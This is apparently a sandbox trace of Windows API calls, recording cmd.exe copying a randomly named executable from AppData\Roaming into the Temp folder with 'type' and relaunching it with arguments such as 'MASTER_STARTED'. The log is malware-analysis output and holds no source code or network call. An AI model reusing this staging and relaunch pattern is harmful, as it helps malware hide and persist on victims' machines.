\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0094.096] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.096] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.096] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.096] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.096] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.096] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.096] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.096] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.097] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.097] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.097] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.097] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.097] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.097] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.097] GetEnvironmentStringsW () returned 0x3124d8* [0094.097] FreeEnvironmentStringsW (penv=0x3124d8) returned 1 [0094.097] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.097] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.097] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.097] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.097] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.097] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.097] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.097] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.097] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.097] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fba0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fba0, lpFilePart=0x26fb9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fb9c*="Desktop") returned 0x18 [0094.097] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.097] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f91c | out: lpFindFileData=0x26f91c) returned 0x310b68 [0094.097] FindClose (in: hFindFile=0x310b68 | out: hFindFile=0x310b68) returned 1 [0094.097] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f91c | out: lpFindFileData=0x26f91c) returned 0x310b68 [0094.098] FindClose (in: hFindFile=0x310b68 | out: hFindFile=0x310b68) returned 1 [0094.098] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f91c | out: lpFindFileData=0x26f91c) returned 0x310b68 [0094.098] FindClose (in: hFindFile=0x310b68 | out: hFindFile=0x310b68) returned 1 [0094.098] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.098] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0094.098] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0094.098] GetEnvironmentStringsW () returned 0x310388* [0094.098] FreeEnvironmentStringsW (penv=0x310388) returned 1 [0094.098] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.098] GetConsoleOutputCP () returned 0x1b5 [0094.099] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.099] GetUserDefaultLCID () returned 0x409 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fce0, cchData=128 | out: lpLCData="0") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fce0, cchData=128 | out: lpLCData="0") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fce0, cchData=128 | out: lpLCData="1") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0094.099] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.100] GetConsoleTitleW (in: lpConsoleTitle=0x300a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.100] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0094.100] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0094.100] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0094.101] _wcsicmp (_String1="type", _String2=")") returned 75 [0094.101] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0094.101] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0094.101] _wcsicmp (_String1="IF", _String2="type") returned -11 [0094.101] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0094.101] _wcsicmp (_String1="REM", _String2="type") returned -2 [0094.101] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0094.105] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 68 [0094.105] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 68 [0094.105] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 71 [0094.105] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 71 [0094.105] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 80 [0094.105] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 80 [0094.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.107] GetFileType (hFile=0x7) returned 0x2 [0094.107] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fb74 | out: lpMode=0x26fb74) returned 1 [0094.107] _dup (_FileHandle=1) returned 3 [0094.108] _close (_FileHandle=1) returned 0 [0094.108] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", _String2="con") returned -53 [0094.108] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26fb44, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0094.108] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0094.108] GetConsoleTitleW (in: lpConsoleTitle=0x26f974, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.109] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0094.109] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0094.109] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0094.109] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0094.109] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.110] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f4d8) returned 0x300f68 [0094.110] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0094.110] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0094.110] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0094.110] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e3e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0094.110] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] GetFileType (hFile=0x54) returned 0x1 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e43c | out: lpFileSizeHigh=0x26e43c*=0x0) returned 0x7d600 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.111] GetFileType (hFile=0x4c) returned 0x1 [0094.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.111] GetFileType (hFile=0x4c) returned 0x1 [0094.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.112] GetFileType (hFile=0x4c) returned 0x1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.112] GetFileType (hFile=0x4c) returned 0x1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.113] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.114] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.115] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.116] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, 